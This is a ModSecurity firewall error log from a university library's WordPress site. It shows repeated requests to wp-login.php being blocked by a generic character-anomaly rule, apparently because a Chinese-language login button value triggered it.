[Mon Aug 28 19:26:45.485505 2023] [:error] [pid 50574] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyShcCo-f0AAMWO0oIAAAAT"]
[Mon Aug 28 19:26:52.498536 2023] [:error] [pid 50701] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySjMCo-f0AAMYNqRkAAAAI"]
[Mon Aug 28 19:26:59.944552 2023] [:error] [pid 50711] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySk8Co-f0AAMYX9Z8AAAAZ"]
[Mon Aug 28 19:27:06.771559 2023] [:error] [pid 50670] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySmsCo-f0AAMXunzoAAAAQ"]
[Mon Aug 28 19:27:13.644682 2023] [:error] [pid 50594] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySocCo-f0AAMWiyikAAAAC"]
[Mon Aug 28 19:27:21.730235 2023] [:error] [pid 50668] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySqcCo-f0AAMXsYPAAAAAS"]
[Mon Aug 28 19:27:28.531836 2023] [:error] [pid 50718] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySsMCo-f0AAMYe@pUAAAAR"]
[Mon Aug 28 19:27:35.741378 2023] [:error] [pid 50717] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySt8Co-f0AAMYd8@4AAAAO"]
[Mon Aug 28 19:27:43.178670 2023] [:error] [pid 50721] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySv8Co-f0AAMYh7swAAAAX"]
[Mon Aug 28 19:27:49.991638 2023] [:error] [pid 50718] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySxcCo-f0AAMYe@pYAAAAR"]
[Mon Aug 28 19:27:57.897103 2023] [:error] [pid 50702] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOySzcCo-f0AAMYOGqEAAAAJ"]
[Mon Aug 28 19:28:05.352855 2023] [:error] [pid 50718] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyS1cCo-f0AAMYe@pcAAAAR"]
[Mon Aug 28 19:28:12.620101 2023] [:error] [pid 50702] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyS3MCo-f0AAMYOGqIAAAAJ"]
[Mon Aug 28 19:28:20.916516 2023] [:error] [pid 50723] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyS5MCo-f0AAMYji0UAAAAA"]
[Mon Aug 28 19:28:31.969310 2023] [:error] [pid 50717] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyS78Co-f0AAMYd8@8AAAAO"]
[Mon Aug 28 19:28:35.916726 2023] [:error] [pid 50717] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyS88Co-f0AAMYd8-AAAAAO"]
[Mon Aug 28 19:28:44.091103 2023] [:error] [pid 50732] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyS-MCo-f0AAMYsMNoAAAAM"]
[Mon Aug 28 19:28:51.550566 2023] [:error] [pid 50729] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyTA8Co-f0AAMYpQBoAAAAG"]
[Mon Aug 28 19:28:59.464185 2023] [:error] [pid 50713] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyTC8Co-f0AAMYZWnMAAAAb"]
[Mon Aug 28 19:29:07.834384 2023] [:error] [pid 50730] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyTE8Co-f0AAMYqSZ4AAAAH"]
[Mon Aug 28 19:29:15.298818 2023] [:error] [pid 50738] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyTG8Co-f0AAMYyuscAAAAN"]
[Mon Aug 28 19:29:24.534705 2023] [:error] [pid 50778] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyTJMCo-f0AAMZan3YAAAAK"]
[Mon Aug 28 19:29:31.240158 2023] [:error] [pid 50722] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyTK8Co-f0AAMYi4bEAAAAY"]
[Mon Aug 28 19:29:38.537048 2023] [:error] [pid 50779] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyTMsCo-f0AAMZbty8AAAAP"]
[Mon Aug 28 19:29:45.473141 2023] [:error] [pid 50780] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyTOcCo-f0AAMZcbuwAAAAD"]
[Mon Aug 28 19:29:53.299948 2023] [:error] [pid 50783] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyTQcCo-f0AAMZfiCkAAAAN"]
[Mon Aug 28 19:29:59.640129 2023] [:error] [pid 50780] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyTR8Co-f0AAMZcbu0AAAAD"]
[Mon Aug 28 19:30:06.165409 2023] [:error] [pid 50782] [client 39.39.202.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyTTsCo-f0AAMZeKmEAAAAK"]
[Mon Aug 28 21:27:52.557167 2023] [:error] [pid 52832] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyu6MCo-f0AAM5gC7sAAAAM"]
[Mon Aug 28 21:29:22.746773 2023] [:error] [pid 52730] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyvQsCo-f0AAM36HF4AAAAC"]
[Mon Aug 28 21:31:04.933066 2023] [:error] [pid 52869] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyvqMCo-f0AAM6FUDwAAAAA"]
[Mon Aug 28 21:32:51.775428 2023] [:error] [pid 52832] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOywE8Co-f0AAM5gC7wAAAAM"]
[Mon Aug 28 21:34:39.114961 2023] [:error] [pid 52832] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOywf8Co-f0AAM5gC74AAAAM"]
[Mon Aug 28 21:36:25.449194 2023] [:error] [pid 52922] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyw6cCo-f0AAM66Bl0AAAAb"]
[Mon Aug 28 21:38:14.468297 2023] [:error] [pid 52924] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyxVsCo-f0AAM68UuEAAAAB"]
[Mon Aug 28 21:40:05.869318 2023] [:error] [pid 52913] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyxxcCo-f0AAM6xIy0AAAAO"]
[Mon Aug 28 21:41:59.461684 2023] [:error] [pid 53035] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyyN8Co-f0AAM8rC8AAAAAH"]
[Mon Aug 28 21:43:54.680831 2023] [:error] [pid 53035] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyyqsCo-f0AAM8rC8IAAAAH"]
[Mon Aug 28 21:45:48.237417 2023] [:error] [pid 53088] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOyzHMCo-f0AAM9gomEAAAAM"]
